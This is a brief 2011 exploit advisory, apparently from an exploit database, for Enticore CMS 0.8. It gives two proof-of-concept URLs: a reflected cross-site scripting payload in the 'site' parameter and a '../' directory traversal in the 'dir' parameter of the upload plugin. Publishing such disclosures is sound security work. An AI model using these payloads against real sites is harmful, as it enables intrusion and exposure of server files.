# Exploit Title: Enticore CMS Directory Traversal (logged only)
# Google Dork:
# Date: 24.09.2011
# Author: Jakub Galczyk /
# Software Link: http://sourceforge.net/projects/enticore/
# Version: 0.8
# Tested on: Ubuntu 10.10
# CVE :
PoC XSS:
http://enticore.sourceforge.net/index.php?plugin=EnticorePluginUpload&site=<script>alert(123)</script>&dir=yo
PoC DT:
http://enticore-0.8/index.php?plugin=EnticorePluginUpload&site=upload&dir=../../../../../../../../../../../../../home/
# best regards from
# http://hauntit.wordpress.com/
#
--
Jakub Ga?czyk